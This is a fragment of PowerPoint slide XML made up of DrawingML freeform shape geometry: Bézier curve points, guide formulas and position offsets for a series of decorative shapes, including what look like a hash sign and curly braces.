                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="157" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="149"/>
                      <a:pt x="154" y="151"/>
                      <a:pt x="153" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="149" y="156"/>
                      <a:pt x="147" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="161"/>
                      <a:pt x="139" y="161"/>
                      <a:pt x="135" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="156"/>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9"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>
                      <a:pt x="145" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="192"/>
                      <a:pt x="158" y="189"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="171"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60" y="161"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="155"/>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5" y="72"/>
                      <a:pt x="91" y="74"/>
                      <a:pt x="87" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="76" y="82"/>
                      <a:pt x="73" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>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100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="105"/>
                      <a:pt x="52" y="108"/>
                      <a:pt x="50" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="138"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="142"/>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3"/>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70"/>
                      <a:pt x="69" y="172"/>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7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="71"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4" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="173"/>
                      <a:pt x="116" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="173"/>
                      <a:pt x="117"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2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="157"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="119" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="127" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="142" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="136"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3" y="103"/>
                      <a:pt x="121" y="99"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="108"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0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="38"/>
                      <a:pt x="95" y="37"/>
                      <a:pt x="98" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="43"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="49"/>
                      <a:pt x="101" y="50"/>
                      <a:pt x="102" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="32"/>
                      <a:pt x="100" y="30"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>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5" y="33"/>
                      <a:pt x="73" y="31"/>
                      <a:pt x="70" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="31"/>
                      <a:pt x="67" y="33"/>
                      <a:pt x="66" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="51"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="70" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="49"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75"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1"/>
                      <a:pt x="68" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="66"/>
                      <a:pt x="74" y="67"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="64"/>
                      <a:pt x="92" y="66"/>
                      <a:pt x="86" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79" y="70"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="42"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="42"/>
                      <a:pt x="72" y="43"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="45"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="40"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="42"/>
                      <a:pt x="100" y="40"/>
                      <a:pt x="99" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99"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Freeform 372"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2672" y="188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Freeform 373"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2684" y="1883"/>
                <a:ext cx="5" cy="3"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 4"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 3 w 4"/>
                  <a:gd name="T3" fmla="*/ 0 h 2"/>
                  <a:gd name="T4" fmla="*/ 4 w 4"/>
                  <a:gd name="T5" fmla="*/ 1 h 2"/>
                  <a:gd name="T6" fmla="*/ 2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0"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="4"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Freeform 374"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2043"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Freeform 375"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2193"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Freeform 376"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2342" y="37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Freeform 377"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="249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Freeform 378"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2687"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Freeform 379"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2837"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Freeform 380"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="298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Freeform 381"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3182"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Freeform 382"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3332"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Freeform 383"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="371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Freeform 384"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3905"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Freeform 385"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="410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2" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30" y="12"/>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Freeform 386"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4285" y="379"/>
                <a:ext cx="189" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 66 h 218"/>
                  <a:gd name="T2" fmla="*/ 184 w 189"/>
                  <a:gd name="T3" fmla="*/ 84 h 218"/>
                  <a:gd name="T4" fmla="*/ 141 w 189"/>
                  <a:gd name="T5" fmla="*/ 84 h 218"/>
                  <a:gd name="T6" fmla="*/ 130 w 189"/>
                  <a:gd name="T7" fmla="*/ 134 h 218"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 134 h 218"/>
                  <a:gd name="T10" fmla="*/ 173 w 189"/>
                  <a:gd name="T11" fmla="*/ 151 h 218"/>
                  <a:gd name="T12" fmla="*/ 127 w 189"/>
                  <a:gd name="T13" fmla="*/ 151 h 218"/>
                  <a:gd name="T14" fmla="*/ 112 w 189"/>
                  <a:gd name="T15" fmla="*/ 218 h 218"/>
                  <a:gd name="T16" fmla="*/ 91 w 189"/>
                  <a:gd name="T17" fmla="*/ 218 h 218"/>
                  <a:gd name="T18" fmla="*/ 106 w 189"/>
                  <a:gd name="T19" fmla="*/ 151 h 218"/>
                  <a:gd name="T20" fmla="*/ 65 w 189"/>
                  <a:gd name="T21" fmla="*/ 151 h 218"/>
                  <a:gd name="T22" fmla="*/ 50 w 189"/>
                  <a:gd name="T23" fmla="*/ 218 h 218"/>
                  <a:gd name="T24" fmla="*/ 29 w 189"/>
                  <a:gd name="T25" fmla="*/ 218 h 218"/>
                  <a:gd name="T26" fmla="*/ 43 w 189"/>
                  <a:gd name="T27" fmla="*/ 151 h 218"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 151 h 218"/>
                  <a:gd name="T30" fmla="*/ 3 w 189"/>
                  <a:gd name="T31" fmla="*/ 134 h 218"/>
                  <a:gd name="T32" fmla="*/ 48 w 189"/>
                  <a:gd name="T33" fmla="*/ 134 h 218"/>
                  <a:gd name="T34" fmla="*/ 57 w 189"/>
                  <a:gd name="T35" fmla="*/ 84 h 218"/>
                  <a:gd name="T36" fmla="*/ 11 w 189"/>
                  <a:gd name="T37" fmla="*/ 84 h 218"/>
                  <a:gd name="T38" fmla="*/ 15 w 189"/>
                  <a:gd name="T39" fmla="*/ 66 h 218"/>
                  <a:gd name="T40" fmla="*/ 61 w 189"/>
                  <a:gd name="T41" fmla="*/ 66 h 218"/>
                  <a:gd name="T42" fmla="*/ 74 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 218"/>
                  <a:gd name="T44" fmla="*/ 96 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 218"/>
                  <a:gd name="T46" fmla="*/ 82 w 189"/>
                  <a:gd name="T47" fmla="*/ 66 h 218"/>
                  <a:gd name="T48" fmla="*/ 124 w 189"/>
                  <a:gd name="T49" fmla="*/ 66 h 218"/>
                  <a:gd name="T50" fmla="*/ 138 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 218"/>
                  <a:gd name="T52" fmla="*/ 159 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 218"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 66 h 218"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 66 h 218"/>
                  <a:gd name="T58" fmla="*/ 121 w 189"/>
                  <a:gd name="T59" fmla="*/ 84 h 218"/>
                  <a:gd name="T60" fmla="*/ 78 w 189"/>
                  <a:gd name="T61" fmla="*/ 84 h 218"/>
                  <a:gd name="T62" fmla="*/ 67 w 189"/>
                  <a:gd name="T63" fmla="*/ 134 h 218"/>
                  <a:gd name="T64" fmla="*/ 110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6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="184" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="66"/>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Freeform 387"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4502"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Freeform 388"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="469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Freeform 389"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4894"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Freeform 390"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5043" y="374"/>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Freeform 391"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5241" y="372"/>
                <a:ext cx="82"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Freeform 392"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5389"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Freeform 393"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5539"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Freeform 394"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5687"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Freeform 395"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5877" y="379"/>
                <a:ext cx="78" cy="293"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 64"/>
                  <a:gd name="T1" fmla="*/ 240 h 240"/>
                  <a:gd name="T2" fmla="*/ 22 w 64"/>
                  <a:gd name="T3" fmla="*/ 198 h 240"/>
                  <a:gd name="T4" fmla="*/ 22 w 64"/>
                  <a:gd name="T5" fmla="*/ 157 h 240"/>
                  <a:gd name="T6" fmla="*/ 0 w 64"/>
                  <a:gd name="T7" fmla="*/ 128 h 240"/>
                  <a:gd name="T8" fmla="*/ 0 w 64"/>
                  <a:gd name="T9" fmla="*/ 112 h 240"/>
                  <a:gd name="T10" fmla="*/ 22 w 64"/>
                  <a:gd name="T11" fmla="*/ 82 h 240"/>
                  <a:gd name="T12" fmla="*/ 22 w 64"/>
                  <a:gd name="T13" fmla="*/ 42 h 240"/>
                  <a:gd name="T14" fmla="*/ 64 w 64"/>
                  <a:gd name="T15" fmla="*/ 0 h 240"/>
                  <a:gd name="T16" fmla="*/ 64 w 64"/>
                  <a:gd name="T17" fmla="*/ 17 h 240"/>
                  <a:gd name="T18" fmla="*/ 42 w 64"/>
                  <a:gd name="T19" fmla="*/ 44 h 240"/>
                  <a:gd name="T20" fmla="*/ 42 w 64"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 21 w 64"/>
                  <a:gd name="T23" fmla="*/ 119 h 240"/>
                  <a:gd name="T24" fmla="*/ 21 w 64"/>
                  <a:gd name="T25" fmla="*/ 120 h 240"/>
                  <a:gd name="T26" fmla="*/ 42 w 64"/>
                  <a:gd name="T27" fmla="*/ 155 h 240"/>
                  <a:gd name="T28" fmla="*/ 42 w 64"/>
                  <a:gd name="T29" fmla="*/ 194 h 240"/>
                  <a:gd name="T30" fmla="*/ 47 w 64"/>
                  <a:gd name="T31" fmla="*/ 216 h 240"/>
                  <a:gd name="T32" fmla="*/ 64 w 64"/>
                  <a:gd name="T33" fmla="*/ 223 h 240"/>
                  <a:gd name="T34" fmla="*/ 64 w 64"/>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240"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="240"/>
                      <a:pt x="22" y="226"/>
                      <a:pt x="22" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="157"/>
                      <a:pt x="22" y="157"/>
                      <a:pt x="22" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="138"/>
                      <a:pt x="14" y="129"/>
                      <a:pt x="0" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="112"/>
                      <a:pt x="0" y="112"/>
                      <a:pt x="0" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="111"/>
                      <a:pt x="22" y="101"/>
                      <a:pt x="22" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="42"/>
                      <a:pt x="22" y="42"/>
                      <a:pt x="22" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="14"/>
                      <a:pt x="36" y="0"/>
                      <a:pt x="64" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="17"/>
                      <a:pt x="64" y="17"/>
                      <a:pt x="64" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="17"/>
                      <a:pt x="42" y="26"/>
                      <a:pt x="42" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="84"/>
                      <a:pt x="42" y="84"/>
                      <a:pt x="42" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="103"/>
                      <a:pt x="35" y="115"/>
                      <a:pt x="21" y="119"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="124"/>
                      <a:pt x="42" y="136"/>
                      <a:pt x="42" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="194"/>
                      <a:pt x="42" y="194"/>
                      <a:pt x="42" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="205"/>
                      <a:pt x="43" y="212"/>
                      <a:pt x="47" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="220"/>
                      <a:pt x="55" y="223"/>
                      <a:pt x="64" y="223"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="64"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Freeform 396"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5985" y="379"/>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4 h 240"/>
                  <a:gd name="T14" fmla="*/ 21 w 63"/>
                  <a:gd name="T15" fmla="*/ 155 h 240"/>
                  <a:gd name="T16" fmla="*/ 42 w 63"/>
                  <a:gd name="T17" fmla="*/ 120 h 240"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 119 h 240"/>
                  <a:gd name="T20" fmla="*/ 21 w 63"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 44 h 240"/>
                  <a:gd name="T24" fmla="*/ 0 w 63"/>
                  <a:gd name="T25" fmla="*/ 17 h 240"/>
